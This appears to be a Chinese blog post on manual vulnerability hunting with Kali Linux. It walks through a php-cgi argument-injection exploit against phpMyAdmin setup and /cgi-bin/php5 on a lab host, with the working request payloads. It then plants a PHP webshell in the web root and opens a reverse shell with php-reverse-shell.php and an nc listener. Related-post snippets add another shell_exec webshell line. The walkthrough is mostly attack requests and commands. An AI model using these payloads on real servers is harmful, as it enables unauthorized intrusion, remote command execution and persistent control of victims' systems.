kali linux挖漏洞,kali linux之手动漏洞挖掘一

最新推荐文章于 2024-06-15 18:15:26 发布
最新推荐文章于 2024-06-15 18:15:26 发布
阅读量558 收藏 5
点赞数
文章标签: kali linux挖漏洞

默认安装漏洞

phpmyadmin/setup默认安装

ubuntu/debian默认安装php5-cgi

phpmyadmin/setup默认安装

728b88739dec903a1180bd438926f1d4.png

使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1对php.ini文件做试探)

POSThttp://192.168.1.12/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1

Host: 192.168.1.12

Content-Length: 34

passthru('id'); ##使用passthru函数,执行命令,比如ls,cat等,如果可以执行,也可以写一句话木马进去

die(); ##die函数,不执行以下的操作

?>

点击那个笔,把设置好对应的端口

256b7764acc8c185606898dffb1bbacc.png

点击go,帐号就显示出来了(www权限)

e40ae94664a20ae95a751e1251a12ff9.png

pwd命令

2a9d412ae9ab76b88a20ce4d33272cd1.png

写入网页木马

echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" >/var/www/xxsec.php

c19f5bc575a3fb05f2d41a469a159b72.png

3396cbd3c1e41da44d301648748fc9eb.png

写好木马后即可执行命令

954122671c6bdb844e2bfe48477d4ce3.png

反弹shell

e61838ec812ad6e5df7290685c6dc7a2.png

把php-reverse-shell.php拷贝到其他目录,然后编辑它,把ip地址变成攻击机

50fb1380361412bd4ad8566be977d900.png

编辑后保存,把内容发送到目标机器上(因为它是反弹链接,所以发送前,先用nc监听好端口)

fbc1233949d3c04f5d28e0441d65c0a5.png

我反弹shell上的反弹的1234端口,用nc监听1234端口,发送后就会反弹到nc会话

b07e2a6a405c0f5af05c8c8bd29a3694.png

ubuntu/debian默认安装php5-cgi,可以直接访问/cgi-bin/php5和cgi-bin/php(这个目录是爬不出来的)

-d allow_url_in clude=on -d safe_mode= off -d suhosin.simul ation=on -d disa

把这些代码复制到burp编码为url,否则执行不了,

a6f4a0d46029715704d33b99ca93d616.png

这里的host主机头必须有,使用system函数执行命令<?php echo system('id'); die(); ?>

aadd49cdc6c52c36a203ff029945963b.png

查看所有用户信息

154d4b42bfb35d5e94621c459e0db33d.png

也可以让主机监听一个端口,我们用nc连接这个端口,但是可能会被防火墙拦

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

奉义天涯
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali渗透学习-web渗透手动漏洞挖掘(一)
weixin_43239236的博客
01-23 783
流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。 漏洞类型–phpMyadmin远程命令执行漏洞 1、攻击原理和思路 安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。 a.探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫
网络攻防安全kali Linux漏洞扫描
06-18
#### 一、网络攻防安全中的Kali Linux漏洞扫描 **Kali Linux**是一款专门设计用于数字取证、安全审计、逆向工程和渗透测试的操作系统。它内置了大量的安全软件和工具,使其成为进行网络安全研究的理想平台。 #### ...
kali linux漏洞,Kali Linux笔记(四十九):手动漏洞挖掘
weixin_29821699的博客
05-16 320
' union select null,'
kali linux渗透测试之漏洞扫描
heike_Ch的博客
06-15 768
进行渗透测试需要进行漏洞扫描,今天就分享给大家几款漏洞扫描软件用法。Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。。。这是一款kaliLinux自带的软件。其对服务器扫描具有优势。强调:nikto更多针对主机!!!!!!系统漏洞扫描与分析软件Nessus 是全世界最多人使用的系统漏洞扫描与分析软件。
kali linux之手动漏洞挖掘
weixin_30632883的博客
02-28 333
默认安装漏洞 phpmyadmin/setup默认安装 ubuntu/debian默认安装php5-cgi phpmyadmin/setup默认安装 使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1对php.ini文件做试探) POSThttp://192.168.1.12/ph...
kali渗透学习-web渗透手动漏洞挖掘(四)
weixin_43239236的博客
01-23 206
文件上传漏洞 【经典漏洞,本身为一个功能,根源:对上传文件的过滤机制不严谨】 编写一句话,然后直接上传文件测试: <?php echo shell_exec($_GET['cmd']);?> 直接上传webshell 看是否上传成功 进行一句话测试 绕过过滤机制 低安全级别代码没有过滤机制 绕过:可截包重放,修改上传文件大小等限制 中安全级别 针对文件类型有过滤需要image/jpeg类型 进行截断,重放修改文件类型 绕过:截包,修改上传类型Content-Type,重放 mimetyp
Kali Linux学习笔记—Web渗透(2-3)手动漏洞挖掘
weixin_43653897的博客
12-16 1132
手动漏洞挖掘身份认证 账号密码层面会话sessionID密码找回漏洞挖掘原则目录遍历 / 文件包含 matesploitable:172.16.2.65 kali linux:172.16.2.63 身份认证 账号密码层面 常用弱口令/基于字典的密码爆破 锁定账号 信息手机 手机号 密码错误提示信息 密码嗅探 如果有不一样,可将其右键发送到intruder加入变量 会话sessionID Xss / cookie importer SessionID in URL 嗅探 SessionID
kali Linux系统的漏洞利用
最新发布
06-19
### Kali Linux系统的漏洞利用 #### 一、Metasploitable操作系统 Metasploitable是一款专为安全测试和渗透测试设计的操作系统,基于Ubuntu Linux。它预装了一系列易受攻击的服务和应用程序,使得安全专家可以方便...
49-49.渗透测试-Kali Linux漏洞扫描.mp4
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
Kali Linux渗透测试 101 手动漏洞挖掘-CSRF 漏洞
kevinhanser
03-26 2146
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 从信任角度XSS:利用用户对站点的信任,攻击者通过注入程序来修改网站来使用户浏览器被重定向等 CSRF:利用站带你对已经身份认证的用户的信任,攻击者伪造一个链接误导用户点击链接来使用用户的身份认证
kali linux之手动漏洞挖掘
weixin_30593443的博客
03-01 205
漏洞挖掘原则/宗旨----所有变量,所有头(cookie中的变量),逐个变量删除 身份认证 常用若口令/基于字典的密码爆破/锁定帐号 信息收集(手机号,身份证,住址信息等等) 密码嗅探 会话sessionID xss/cookie sessionID in url sessionID长期不变/永久不变 sessionID生成算法 ...
小白日记36:kali渗透测试之Web渗透-手动漏洞挖掘(二)-突破身份认证,操作系统任意命令执行漏洞
ZiXuanFY的博客
10-22 3799
手动漏洞挖掘 身份认证 1、常用弱口令/基于字典的密码爆破 2、锁定机制 手工猜测,若无锁定机制,则进行爆破 3、信息收集【分站上信息收集,猜测账号密码,如:用户光荣榜等。】 手机号:对于隐藏部分的手机号,猜测其确切账号(手动输入,已知手机号,观察密码错误提示信息【如:用户名有误】,则爆破用户名) 密码错误提示信息 (burp
Kali Linux渗透测试 088 手动漏洞挖掘-文件上传漏洞
kevinhanser
03-22 2875
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 文件上传漏洞 php 代码<?php echo shell_exec($_GET['cmd']);?>直接上传 webshell 修改文件类型上传 webshellmimetype 文件头、扩展名 修
Kali Linux渗透测试 086 手动漏洞挖掘-命令执行漏洞
kevinhanser
03-21 2187
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 命令执行漏洞 采用 DVWA 系统,IP地址:10.10.10.132 Kali Linux 2018.1,IP地址:10.10.10.131 简介应用程序直接调用操作系统命令的功能 2. 测试 Low
记一次洞实战经历(高危信息泄露)
weixin_63021331的博客
04-19 1053
(免责声明: 本文仅供学习和参考,切勿用于非法途径,未授权的测试皆为违法行为,一切后果自负,与本人无关)由于也是很久没有洞了,所以这次也是先从简单的入手,一些小白也可以学着先从简单的洞开始,在补天上面尽量选择公益src,然后直接翻到最后一百多页点进不知名企业或者学校看看那个提交的漏洞比较少,基本上就可以开始测试了。每次渗透测试并非一蹴而就,需要我们不断的去尝试,只要知道任何防护都有漏洞,不是它太难发现,而是自己能力可能还未达到,最后也是附上chatgtp关于如何学好渗透的建议。
Kali安全渗透测试实践教程】第5章 漏洞利用
小原的博客
08-06 829
Kali安全渗透测试实践教程】第5章 漏洞利用
kali linux漏洞
05-26
Kali Linux是一款以渗透测试和网络安全为主要应用场景的操作系统,它内置了大量的渗透测试工具和漏洞利用框架。漏洞是指计算机软件或者系统中存在的安全缺陷,攻击者可以通过利用漏洞来获取系统权限、窃取敏感信息等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值